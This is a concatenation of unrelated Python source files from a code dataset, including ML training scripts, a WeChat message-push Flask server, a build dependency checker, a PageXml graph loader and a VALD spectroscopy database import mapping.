objective value\n if rescale != 1:\n im = misc.imresize(im, rescale)\n\n img_save_name = (\n \"_\".join(\n [\n \"Tile\",\n str(tile_objective_value),\n str(int(start_w / rescale)),\n str(int(start_h / rescale)),\n ]\n )\n + tile_format\n )\n\n misc.imwrite(image_path=output_dir.joinpath(img_save_name), img=im)\n\n data.append(\n [\n iter_tot,\n img_save_name,\n start_w,\n end_w,\n start_h,\n end_h,\n im.shape[0],\n im.shape[1],\n ]\n )\n iter_tot += 1\n\n # Save information on each slide to relate to the whole slide image\n df = pd.DataFrame(\n data,\n columns=[\n \"iter\",\n \"Tile_Name\",\n \"start_w\",\n \"end_w\",\n \"start_h\",\n \"end_h\",\n \"size_w\",\n \"size_h\",\n ],\n )\n df.to_csv(output_dir.joinpath(\"Output.csv\"), index=False)\n\n # Save slide thumbnail\n slide_thumb = self.slide_thumbnail()\n misc.imwrite(\n output_dir.joinpath(\"slide_thumbnail\" + tile_format), img=slide_thumb\n )\n","sub_path":"tiatoolbox/dataloader/wsireader.py","file_name":"wsireader.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"57689555","text":"import traceback\r\nimport torch.nn as nn\r\nimport CONSTANTS, train_test, train_test_dataloader, utility\r\nfrom models import basic_mnist, cifar10_groups_dws_s7_model, ResNet\r\n\r\n\r\ndef run_model_run(session=\"s8\", dataset=\"cifar10\"):\r\n try:\r\n train_transforms, test_transforms = train_test_dataloader.define_train_test_transformers(session=session)\r\n train_data, test_data = train_test_dataloader.download_data(\r\n dataset_name=utility.get_dataset_name(session=session),\r\n train_transforms=train_transforms,\r\n test_transforms=test_transforms)\r\n\r\n train_loader, test_loader = train_test_dataloader.get_train_test_dataloaders(train_data=train_data,\r\n test_data=test_data,\r\n data_loader_args=utility.get_dataloader_args())\r\n\r\n all_regularizations_list, tracker = utility.get_combos_and_trackers()\r\n device = utility.get_device()\r\n # utility.get_all_models_summary()\r\n loss_fn = nn.functional.nll_loss\r\n model = None\r\n\r\n for combo in all_regularizations_list:\r\n print(\"\\nRunning for: \", combo)\r\n\r\n if dataset and dataset.lower() == \"mnist\":\r\n if CONSTANTS.GBN in combo.lower():\r\n model = basic_mnist.GBNNet().to(device)\r\n else:\r\n model = basic_mnist.S6_MNIST().to(device)\r\n\r\n elif \"s7\" in session.lower() and (dataset and dataset.lower() == \"cifar10\"):\r\n model = cifar10_groups_dws_s7_model.S7_CIFAR10()\r\n model = model.to(device)\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n elif \"s8\" in session.lower() and (dataset and dataset.lower() == \"cifar10\"):\r\n model = ResNet.ResNet18()\r\n model = model.to(device)\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n optimizer = utility.get_optimizer(model=model)\r\n scheduler = utility.get_scheduler(optimizer=optimizer)\r\n utility.show_model_summary(title=model.__doc__, model=model, input_size=utility.get_input_size(\r\n dataset=utility.get_dataset_name(session=session)))\r\n\r\n train_test.train_test(model=model, device=device, train_loader=train_loader, optimizer=optimizer,\r\n epochs=int(utility.get_config_details()[CONSTANTS.MODEL_CONFIG][CONSTANTS.EPOCHS]),\r\n scheduler=scheduler,\r\n test=True, test_loader=test_loader, type_=combo, tracker=tracker,\r\n loss_fn=loss_fn)\r\n\r\n for plot_type in utility.get_config_details()[CONSTANTS.PLOTS][CONSTANTS.TO_PLOT].strip().split(','):\r\n utility.plot(title=\"Plot is for:\" + plot_type, x_label='Epochs', y_label=plot_type.lower(),\r\n tracker=tracker, category=plot_type)\r\n except Exception as e:\r\n print(traceback.format_exc(e))\r\n\r\n\r\nif __name__ == '__main__':\r\n run_model_run(session=\"s8\")\r\n","sub_path":"S8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"223880973","text":"## QUESTÃO 2 ##\n# Escreva um programa que converta uma temperatura digitada em °C (graus celsius) \n# para °F (graus fahrenheit). \n##\n\n\n##\n# A sua resposta da questão deve ser desenvolvida dentro da função main()!!! \n# Deve-se substituir o comado print existente pelo código da solução.\n# Para a correta execução do programa, a estrutura atual deve ser mantida,\n# substituindo apenas o comando print(questão...) existente.\n##\ndef main():\n tempCelsius = int(input(\"Digite a temperatura em Celsius\"))\n\n tempFahrenheit = tempCelsius * 9/5 + 32\n\n print(\"a temperatura em fahrenheit é {} graus\".format(tempFahrenheit))\n \n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"questoes/questao_2.py","file_name":"questao_2.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"217328978","text":"#!/bin/bash\n\nimport sys\nimport os\nimport re\n\ndef title(title_str):\n print(\"\")\n print(\"###############################################################################\")\n print(title_str)\n print(\"###############################################################################\")\n\ndef check_dependencies_libs(lib_list):\n for lib_name in lib_list:\n dependency_check_out = os.popen('ldconfig -p | grep ' + lib_name).read()\n dependency_check_out = ''.join(dependency_check_out.split()).replace(\"\\n\", \"\")\n\n if dependency_check_out == '':\n print('Missing lybrary ' + lib_name)\n exit()\n else:\n print(lib_name + ' ok')\n\ndef check_dependencies_tools(tools_list):\n for tool_name in tools_list:\n dependency_check_out = os.popen('command -v ' + tool_name + ' -v').read()\n dependency_check_out = ''.join(dependency_check_out.split()).replace(\"\\n\", \"\")\n\n if dependency_check_out == '':\n print('Missing tool ' + tool_name)\n exit()\n else:\n print(tool_name + ' ok')\n\ndef check_dependencies_python(pkg_list):\n for pkg in pkg_list:\n try:\n import pkg\n print()\n except ImportError:\n print('Missing Python package ' + pkg)\n exit()\n\ndef trick_eclipse(projec_dir):\n \"\"\"\n Trick eclipse, letting the binaries be built in a bin directory\n :return:\n \"\"\"\n os.system('cd ' + projec_dir)\n os.system('rm -rf Debug')\n os.system('rm -rf Release')\n os.system('mkdir bin')\n os.system('ln -s bin Debug')\n os.system('ln -s bin Release')\n\n\nif __name__ == '__main__':\n title('Checking dependencies')\n lib_list = ('armadillo', 'ITG', 'sqlite3', 'libboost', 'libblas', 'liblapack', 'openblas', 'sctp', 'log4cpp')\n tool_list = ('tshark', 'wireshark', 'octave', 'sqlite3', 'cmake', 'iperf', 'ostinato')\n python_dps = ('sqlite3', 'pyshark', 'rstr', 'numpy', 'fnvhash', 'termcolor')\n check_dependencies_libs(lib_list)\n check_dependencies_tools(tool_list)\n #check_dependencies_python(python_dps)\n\n title('Building libsimicar')\n #os.system('make -C common/')\n\n title('Building trace-analyzer')\n #os.system('make -C trace-analyzer')\n\n kkk = os.listdir('apps/')\n print(kkk)\n\n\n\n\n\n\n\n\n\n","sub_path":"simitar.py","file_name":"simitar.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"217398526","text":"#!/usr/bin/python\r\n# coding: utf-8\r\n# Date 2021/7/20\r\nfrom flask import Flask,request,session\r\napp = Flask(__name__)\r\napp.config[\"SECRET_KEY\"] = \"131\"\r\n\r\nimport requests\r\nappID='xxx'\r\nappsecret='xxx'\r\ntemplate_id=\"xxx\"\r\n\r\n\r\ndef get_acctoken():\r\n url = \"https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=\" + appID + \"&secret=\" + appsecret\r\n r = requests.get(url)\r\n if 'access_token' in r.json():\r\n return r.json()['access_token']\r\n else:\r\n return False\r\n\r\ndef send_tomsg(token,title,body,touserid):\r\n data={\"touser\":touserid,\r\n \"url\":\"https://www.baidu.com\",\r\n \"template_id\":template_id,\r\n \"topcolor\":\"#FF0000\",\r\n \"data\":{\"title1\":\r\n {\"value\":\"标题:\\t\\t\\t\\t\"+title,\"color\":\"#A8A8A8\"},\r\n \"title2\":\r\n {\"value\":\"通知内容:\\t\\t\\t\\t\",\"color\":\"#A8A8A8\"},\r\n \"title3\":\r\n {\"value\":\"通知时间:\\t\\t\\t\\t\",\"color\":\"#A8A8A8\"},\r\n \"title4\":\r\n {\"value\":\"备注:\\t\\t\\t\\t\",\"color\":\"#A8A8A8\"},\r\n \"content1\":\r\n {\"value\":str(body)+\"\\n\"},\r\n \"content2\":\r\n {\"value\":\"2021-11-17 16:19:36\\n\"},\r\n \"content3\": {\"value\":\"本次推送由print支持\\n\"}}}\r\n url_vx = \"https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=\" + token\r\n data2=requests.post(url_vx, json=data).json()\r\n if data2['errmsg']=='ok':\r\n return True\r\n else:\r\n return False\r\n\r\n##删除当前的acctoken 可能过期了\r\n@app.route(\"/delsession/\")\r\ndef delsession():\r\n if session.get('acctoken'):\r\n session.pop('acctoken')\r\n session.clear()\r\n return 'ok'\r\n else:\r\n return 'no'\r\n\r\n#发送消息\r\n@app.route(\"/msg/\")\r\ndef test():\r\n title = request.args.get(\"title\")\r\n body = request.args.get(\"body\")\r\n touserid=request.args.get(\"touserid\")\r\n if not session.get(\"acctoken\"):\r\n session['acctoken']=get_acctoken()\r\n #print(session.get(\"acctoken\"))\r\n if not session.get(\"error_count\"):\r\n session['error_count']=1\r\n if session.get(\"acctoken\"):\r\n #print(session.get(\"acctoken\"))\r\n if send_tomsg(session.get(\"acctoken\"),title,body,touserid):\r\n return \"发送成功\"\r\n else:\r\n errr_count=session.get(\"error_count\")\r\n if isinstance(errr_count,int):\r\n session['error_count']=errr_count+1\r\n if errr_count+1>10:\r\n session.pop('acctoken')\r\n session.pop('error_count')\r\n session.clear()\r\n return \"发送失败\"\r\n else:\r\n return 'acctoken error'\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='0.0.0.0',port=9916,debug=True)\r\n\r\n #curl http://127.0.0.1:9916/msg?title=111&body=22&touserid=xxx\r\n\r\n","sub_path":"vx_server_push.py","file_name":"vx_server_push.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"286690095","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n Computing the graph for a \"Multi-singlePage-PageXml\" document\n \n A POSTERIORI EXPLANATION :))\n at some point, we had independent pages taht were stored together in a \n single .mpxml file. SO this class can load this file, and build one graph\n per page (instead of one graph per file).\n 2018/03/30 JL\n\n Copyright Xerox(C) 2017 H . Déjean\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n \n \n Developed for the EU project READ. The READ project has received funding \n from the European Union�s Horizon 2020 research and innovation programme \n under grant agreement No 674943.\n \n\"\"\"\n\n\n\n\nfrom lxml import etree\n\nfrom common.trace import traceln\nfrom xml_formats.PageXml import PageXml\n\nfrom .Graph_MultiPageXml import Graph_MultiPageXml\nfrom . import Edge\nfrom .Page import Page\n\n\nclass Graph_MultiSinglePageXml(Graph_MultiPageXml):\n '''\n Computing the graph for a MultiPageXml document\n\n USAGE:\n - call parseFile to load the DOM and create the nodes and edges\n - call detachFromDOM before freeing the DOM\n '''\n #Namespace, of PageXml, at least\n dNS = {\"pc\":PageXml.NS_PAGE_XML}\n \n #How to list the pages of a (Multi)PageXml doc\n sxpPage = \"//pc:Page\"\n\n def __init__(self, lNode = [], lEdge = []):\n Graph_MultiPageXml.__init__(self, lNode, lEdge)\n\n @classmethod\n def loadGraphs(cls\n , cGraphClass # graph class (must be subclass)\n , lsFilename\n , bNeighbourhood=True\n , bDetach=False\n , bLabelled=False\n , iVerbose=0):\n \"\"\"\n Load one graph per file, and detach its DOM\n return the list of loaded graphs\n \"\"\"\n lGraph = []\n for sFilename in lsFilename:\n if iVerbose: traceln(\"\\t%s\"%sFilename)\n lG= Graph_MultiSinglePageXml.getSinglePages(cGraphClass, sFilename, bNeighbourhood,bDetach,bLabelled, iVerbose)\n# if bNeighbourhood: g.collectNeighbors() \n# if bLabelled: g.parseDomLabels()\n# if bDetach: g.detachFromDOM()\n lGraph.extend(lG)\n return lGraph\n \n @classmethod\n def getSinglePages(cls\n , cGraphClass # graph class (must be subclass)\n , sFilename\n , bNeighbourhood=True\n , bDetach=False\n , bLabelled=False\n , iVerbose=0):\n \"\"\"\n load a pageXml\n Return a CRF Graph object\n \"\"\"\n \n lGraph=[]\n doc = etree.parse(sFilename)\n\n for pnum, page, domNdPage in cls._iter_Page_DomNode(doc):\n g = cGraphClass()\n g.doc= doc\n \n g.lNode, g.lEdge = list(), list()\n #now that we have the page, let's create the node for each type!\n setPageNdDomId = set() #the set of DOM id\n # because the node types are supposed to have an empty intersection\n\n llPageNodeByType = [ [nd for nd in nodeType._iter_GraphNode(doc, domNdPage, page) ] for nodeType in g.getNodeTypeList()]\n for iType1, lNodeType1 in enumerate(llPageNodeByType):\n lEdge = Edge.Edge.computeEdges(None, lNodeType1, g.iGraphMode)\n traceln(\"\\tType %d - %d %d nodes %d edges\"%(iType1, iType1, len(lNodeType1), len(lEdge)))\n g.lEdge.extend(lEdge)\n g.lNode.extend( lNodeType1 
)\n \n for iType2 in range(iType1+1, len(llPageNodeByType)):\n #for lNodeType2 in llPageNodeByType[iType1:]:\n lNodeType2 = llPageNodeByType[iType2]\n #lPageEdge = Edge.Edge.computeEdges(lPrevPageNode, lPageNode, g.iGraphMode)\n lEdge = Edge.Edge.computeEdges(None, lNodeType1+lNodeType2, g.iGraphMode)\n traceln(\"\\tType %d - %d %d nodes, %d nodes %d edges\"%(iType1, iType2, len(lNodeType1), len(lNodeType2), len(lEdge)))\n g.lEdge.extend(lEdge)\n\n #lPageNode = [nd for nodeType in g.getNodeTypeList() for nd in nodeType._iter_GraphNode(doc, domNdPage, page) ]\n\n #check that each node appears once\n setPageNdDomId = set([nd.domid for nd in g.lNode])\n assert len(setPageNdDomId) == len(g.lNode), \"ERROR: some nodes fit with multiple NodeTypes\"\n \n if iVerbose>=2: traceln(\"\\tPage %5d %6d nodes %7d edges\"%(pnum, len(g.lNode), len(g.lEdge)))\n \n if not g.isEmpty() and len(g.lEdge) > 0: \n if bNeighbourhood: g.collectNeighbors() \n if bLabelled: g.parseDomLabels()\n # if bDetach: g.detachFromDOM()\n \n lGraph.append(g)\n if iVerbose: traceln(\"\\t\\t (%d nodes, %d edges)\"%(len(g.lNode), len(g.lEdge)) )\n \n return lGraph \n \n # ---------------------------------------------------------------------------------------------------------\n @classmethod\n def _iter_Page_DomNode(cls, doc):\n \"\"\"\n Parse a Multi-pageXml DOM, by page\n\n iterator on the DOM, that returns per page:\n page-num (int), page object, page dom node\n \n \"\"\"\n assert Graph_MultiSinglePageXml.sxpPage, \"CONFIG ERROR: need an xpath expression to enumerate PAGE elements\"\n lNdPage = doc.xpath(Graph_MultiSinglePageXml.sxpPage, namespaces=Graph_MultiSinglePageXml.dNS) #all pages\n pnum = 0\n pagecnt = len(lNdPage)\n for ndPage in lNdPage:\n pnum += 1\n iPageWidth = int( ndPage.get(\"imageWidth\") )\n iPageHeight = int( ndPage.get(\"imageHeight\") )\n page = Page(pnum, pagecnt, iPageWidth, iPageHeight, cls=None, domnode=ndPage, domid=ndPage.get(\"id\"))\n yield (pnum, page, ndPage)\n \n \n","sub_path":"TranskribusDU/graph/Graph_Multi_SinglePageXml.py","file_name":"Graph_Multi_SinglePageXml.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"537669988","text":"\"\"\" Module containing helper methods \"\"\"\n\nimport sys\nimport time\nimport traceback\nfrom datetime import datetime\nfrom decimal import Decimal\nimport requests\n\n\ndef apply_format(value):\n \"\"\"Method for applying formats\"\"\"\n return format(Decimal(value), \".5f\")\n\n\ndef apply_format_level(value):\n \"\"\"Method for applying format levels\"\"\"\n return format(Decimal(value), \".2f\")\n\n\ndef get_datetime():\n \"\"\"Method for generating datetime valsuies\"\"\"\n return datetime.now().strftime(\"%Y-%m-%d %h:%m:%s\")\n\n\ndef get_timestamp():\n \"\"\"Method for calculating timestamps\"\"\"\n return time.mktime(time.gmtime())\n\n\ndef get_response(url, resourceid, params=None):\n \"\"\"Method for executing API requests\"\"\"\n guard(resourceid, url)\n url = url % resourceid\n if params:\n url = \"%s%s\" % (url, params)\n\n try:\n response = requests.get(url)\n response.raise_for_status()\n return response.json()\n except requests.exceptions.HTTPError as exc:\n print(\"404 Exception during request %s : %s \" % (url, exc))\n print(\"-\" * 60)\n traceback.print_exc(file=sys.stdout)\n print(\"-\" * 60)\n return None\n\n except requests.exceptions.RequestException as exc:\n print(\"Exception during request %s : %s \" % (url, exc))\n print(\"-\" * 60)\n traceback.print_exc(file=sys.stdout)\n print(\"-\" * 60)\n return None\n\n\ndef guard(resourceid, url):\n \"\"\"Method for checking parameters supplied\"\"\"\n if url is None:\n raise ValueError(\"URL should have a value supplied\")\n if resourceid is None:\n raise ValueError(\"URL %s should have a resource id value supplied\" % url)\n","sub_path":"src/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"524823264","text":"\"\"\"\n 2.2 Return Kth to last\n\"\"\"\n\nclass LinkedListNode:\n def __init__(self, v):\n self.val = v\n self.next = None\n\ndef kth_to_last(sll, k):\n \"\"\"\n Runner technique on the singly linked list in order\n to have a node in advance.\n :param sll:\n :param k:\n :return:\n \"\"\"\n runner = sll\n for i in range(k):\n if not runner:\n return None\n runner = runner.next\n node = sll\n while runner:\n if not runner.next:\n return node.val\n node = node.next\n runner = runner.next\n\nif __name__ == \"__main__\":\n\n Nodes = [\n LinkedListNode(0),\n LinkedListNode(1),\n LinkedListNode(2)\n ]\n for i in range(len(Nodes)-1):\n Nodes[i].next = Nodes[i+1]\n\n print(kth_to_last(Nodes[0], -1))","sub_path":"Chapter02/02_Return_kth_to_last/kth_to_last.py","file_name":"kth_to_last.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"646241267","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThe config file for importing VALD into a database.\n\nGo to http://vamdc.tmy.se/doc/importing.html\nfor understanding what happens below.\n\"\"\"\nimport os, sys\n\nfrom imptools.linefuncs import *\n\n# bibtex-reading helper functions\n\ndef get_bibtex(linedata):\n \"return the raw data\"\n return ' '.join(linedata.split())\n\ndef get_bibtex_dbref(linedata):\n \"extract the dbref from the bibtex entry\"\n first_line = linedata.split()[0]\n typ, dbref = first_line.split('{')\n return dbref.strip(',').strip()\n \n# Setting up filenames\nbase = \"/vald/\"\nspecies_list_file = base + 'VALD_list_of_species'\nvald_cfg_file = base + 'VALD3.cfg'\nvald_file = base + 'vald3.dat'\nterms_file = base + 'terms'\nref_file = base + \"VALD3_ref.bib\"\n\n# The mapping itself\nmapping = [\n # Populate Species model, using the species input file.\n {'outfile':'species.dat',\n 'infiles':species_list_file,\n 'headlines':0,\n 'commentchar':'#',\n 'linemap':[\n {'cname':'id',\n 'cbyte':(charrange, 0,7)},\n {'cname':'name',\n 'cbyte':(charrange, 9,19)},\n {'cname':'inchi',\n 'cbyte':(constant, 'NULL'),\n 'cnull':'NULL'},\n {'cname':'inchikey',\n 'cbyte':(constant, 'NULL'),\n 'cnull':'NULL'},\n {'cname':'ion',\n 'cbyte':(charrange, 20,22)},\n {'cname':'mass',\n 'cbyte':(charrange, 23,30)},\n {'cname':'massno',\n 'cbyte':(charrange2int, 23,30)},\n {'cname':'ionen',\n 'cbyte':(charrange, 31,40)},\n {'cname':'solariso',\n 'cbyte':(charrange, 41,47)},\n {'cname':'dissen',\n 'cbyte':(charrange, 48,57)}, \n {'cname':'ncomp',\n 'cbyte':(charrange, 132,133)},\n {'cname':'atomic',\n 'cbyte':(charrange, 134,136)},\n {'cname':'isotope',\n 'cbyte':(charrange, 137,140)},\n # many2many field \"species\" handled by separate table\n ],\n }, # end of definition for species file\n \n # State model read from states_file -upper states\n # (first section) \n {'outfile':'states.dat', \n 'infiles': (vald_file, terms_file),\n 'headlines':(2, 0),\n 'commentchar': ('#', '#'),\n 'linestep':(1, 2),\n 'lineoffset':(0,1),\n 'errline':(\"Unknown\", \"Unknown\"),\n 'linemap':[\n {'cname':'charid', #species,coup,jnum,term,energy (upper states) \n 'cbyte':(merge_cols,\n (30,36), (170,172), (77,82), (172,218), (63,77))}, \n {'cname':'species',\n 'cbyte':(charrange, 30,36)},\n {'cname':'energy',\n 'cbyte':(charrange, 63,77)},\n #{'cname':'j', \n # 'cbyte':(charrange, 77,82),},\n {'cname':'lande',\n 'cbyte':(charrange, 88,94),\n 'cnull':'99.00'},\n {'cname':'coupling',\n 'cbyte':(charrange, 170,172)},\n {'cname':'term',\n 'cbyte':(charrange, 172,218)},\n {'cname':'energy_ref',\n 'cbyte':(charrange, 264,268)},\n #'references':(models.Source,'pk')},\n {'cname':'lande_ref',\n 'cbyte':(charrange, 268,272)},\n #'references':(models.Source,'pk')},\n {'cname':'level_ref',\n 'cbyte':(charrange, 284,288)},\n #'references':(models.Source,'pk')},\n # these are read from term file\n {'cname':'j',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,1),\n 'cnull':'X',},\n {'cname':'l',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,2),\n 'cnull':'X',},\n {'cname':'s',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,3),\n 'cnull':'X',},\n {'cname':'p',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,4),\n 'cnull':'X',},\n {'cname':'j1',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,5),\n 'cnull':'X',},\n {'cname':'j2',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,6),\n 'cnull':'X',},\n {'cname':'k',\n 'filenum':1, # use term file\n 
'cbyte':(get_term_val,7),\n 'cnull':'X',},\n {'cname':'s2',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,8),\n 'cnull':'X',},\n {'cname':'jc',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,9),\n 'cnull':'X',},\n ]\n }, # end of upper states\n \n # States output file appended with lower states\n {'outfile':'states.dat',\n 'infiles':(vald_file, terms_file),\n 'headlines':(2, 0), \n 'commentchar':('#','#'),\n 'linestep':(1, 2), \n 'errline':(\"Unknown\", \"Unknown\"),\n 'linemap':[\n {'cname':'charid', #species,coup,jnum,term,energy (lower states) \n 'cbyte':(merge_cols,\n (30,36), (122,124), (58,63), (124,170), (44,58))},\n {'cname':'species',\n 'cbyte':(charrange, 30,36)},\n {'cname':'energy',\n 'cbyte':(charrange, 44,58)},\n #{'cname':'j',\n # 'cbyte':(charrange, 58,63)},\n {'cname':'lande',\n 'cbyte':(charrange, 82,88),\n 'cnull':'99.00'},\n {'cname':'coupling',\n 'cbyte':(charrange, 122,124)},\n {'cname':'term',\n 'cbyte':(charrange, 124,170)},\n {'cname':'energy_ref',\n 'cbyte':(charrange, 264,268)},\n #'references':(models.Source,'pk')},\n {'cname':'lande_ref',\n 'cbyte':(charrange, 268,272)},\n #'references':(models.Source,'pk')},\n {'cname':'level_ref',\n 'cbyte':(charrange, 284,288)},\n #'references':(models.Source,'pk')},\n # these are read from term file\n {'cname':'j',\n 'cbyte':(get_term_val,1), \n 'cnull':'X',},\n {'cname':'l',\n 'cbyte':(get_term_val,2),\n 'cnull':'X',},\n {'cname':'s',\n 'cbyte':(get_term_val,3),\n 'cnull':'X',},\n {'cname':'p',\n 'cbyte':(get_term_val,4),\n 'cnull':'X',},\n {'cname':'j1',\n 'cbyte':(get_term_val,5),\n 'cnull':'X',},\n {'cname':'j2',\n 'cbyte':(get_term_val,6),\n 'cnull':'X',},\n {'cname':'k',\n 'cbyte':(get_term_val,7),\n 'cnull':'X',},\n {'cname':'s2',\n 'cbyte':(get_term_val,8),\n 'cnull':'X',},\n {'cname':'jc',\n 'cbyte':(get_term_val,9),\n 'cnull':'X',},\n ]\n }, # end of State model creation - lower states\n \n # Transition model, using the vald file \n {'outfile':'transitions.dat',\n 'infiles':vald_file,\n 'headlines':2,\n 'commentchar':'#',\n 'linemap':[\n {'cname':'id',\n 'cbyte':(constant, 'NULL'),\n 'cnull':'NULL'},\n {'cname':'upstate',\n 'cbyte':(merge_cols,\n (30,36), (170,172), (77,82), (172,218), (63,77))},\n {'cname':'lostate',\n 'cbyte':(merge_cols,\n (30,36), (122,124), (58,63), (124,170), (44,58))},\n {'cname':'vacwave',\n 'cbyte':(charrange, 0,15)},\n {'cname':'airwave',\n 'cbyte':(charrange, 15,30)},\n {'cname':'species',\n 'cbyte':(charrange, 30,36)},\n {'cname':'loggf',\n 'cbyte':(charrange, 36,44)},\n {'cname':'landeff',\n 'cbyte':(charrange, 94,100),\n 'cnull':'99.00'},\n {'cname':'gammarad',\n 'cbyte':(charrange, 100,107),\n 'cnull':'0.0'},\n {'cname':'gammastark',\n 'cbyte':(charrange, 107,114),\n 'cnull':'0.000'}, \n {'cname':'gammawaals',\n 'cbyte':(get_gammawaals, 114,122),\n 'cnull':'0.000',\n 'debug':False},\n {'cname':'sigmawaals', # only filled if raw value > 0. 
\n 'cbyte':(get_sigmawaals, 114,122),\n 'cnull':'0.000',\n 'debug':False},\n {'cname':'alphawaals',\n 'cbyte':(get_alphawaals, 114,122),\n 'cnull':'0.000',\n \"debug\":False},\n {'cname':'accur',\n 'cbyte':(get_accur, (225,226), (226,236)),\n 'debug':False},\n {'cname':'comment',\n 'cbyte':(charrange, 236,252)},\n {'cname':'srctag',\n 'cbyte':(charrange, 218,225),\n 'skiperror':True}, \n {'cname':'wave_ref', \n 'cbyte':(charrange, 252,256)},\n {'cname':'loggf_ref',\n 'cbyte':(charrange, 256,260)},\n {'cname':'lande_ref',\n 'cbyte':(charrange, 268,272)},\n {'cname':'gammarad_ref',\n 'cbyte':(charrange, 272,276)},\n {'cname':'gammastark_ref',\n 'cbyte':(charrange, 276,280)},\n {'cname':'waals_ref', \n 'cbyte':(charrange, 280,284)},\n ],\n }, # end of transitions\n\n # Populate References with bibtex data file (block parsing)\n {'outfile':'references.dat', \n 'infiles':ref_file,\n 'headlines':0, \n 'commentchar':'%',\n 'startblock':('@article','@book','@techreport','@inproceedings','@misc','@ARTICLE','@phdthesis','@unpublished'),\n 'endblock':('@article','@book','@techreport','@inproceedings','@misc','@ARTICLE','@phdthesis','@unpublished'),\n 'linemap':[ \n {'cname':'dbref',\n 'cbyte':(get_bibtex_dbref,)},\n {'cname':'bibtex',\n 'cbyte':(get_bibtex,)}, \n ], \n }, # end of bibtex \n \n # Populate Source model from vald_cfg file\n {'outfile':'linelists.dat',\n 'infiles':vald_cfg_file,\n 'headlines':1,\n 'commentchar':';',\n 'linemap':[\n {'cname':'id',\n 'cbyte':(bySepNr, 1)},\n {'cname':'srcfile',\n 'cbyte':(bySepNr, 0)},\n {'cname':'srcfile_ref', \n 'cbyte':(get_srcfile_ref, 0, 3)},\n {'cname':'speclo',\n 'cbyte':(bySepNr, 2)},\n {'cname':'spechi',\n 'cbyte':(bySepNr, 3)},\n {'cname':'listtype',\n 'cbyte':(bySepNr, 4)},\n {'cname':'r1',\n 'cbyte':(bySepNr, 5)},\n {'cname':'r2',\n 'cbyte':(bySepNr, 6)},\n {'cname':'r3',\n 'cbyte':(bySepNr, 7)},\n {'cname':'r4',\n 'cbyte':(bySepNr, 8)},\n {'cname':'r5',\n 'cbyte':(bySepNr, 9)},\n {'cname':'r6',\n 'cbyte':(bySepNr, 10)},\n {'cname':'r7',\n 'cbyte':(bySepNr, 11)},\n {'cname':'r8',\n 'cbyte':(bySepNr, 12)},\n {'cname':'r9',\n 'cbyte':(bySepNr, 13)},\n {'cname':'srcdescr',\n 'cbyte':(bySepNr, 14)},\n ],\n }, # end of definition for vald_conf file\n \n \n\n ]\n\n#mapping = [mapping[-2]]\n","sub_path":"nodes/vald/mapping_vald3.py","file_name":"mapping_vald3.py","file_ext":"py","file_size_in_byte":11555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
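The column extractors used throughout the linemaps above (charrange, charrange2int, merge_cols, constant, bySepNr, ...) come from imptools.linefuncs, which is not included in this record. As a rough sketch of the fixed-width idea only, an assumption about that package's behaviour rather than its actual source, charrange presumably amounts to:

def charrange(linedata, start, end):
    # Hypothetical stand-in: cut a fixed-width column out of one raw line
    # of vald3.dat and strip the blank padding.
    return linedata[start:end].strip()

# e.g. the species id occupies bytes 30-36 of each transition line:
# species = charrange(line, 30, 36)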
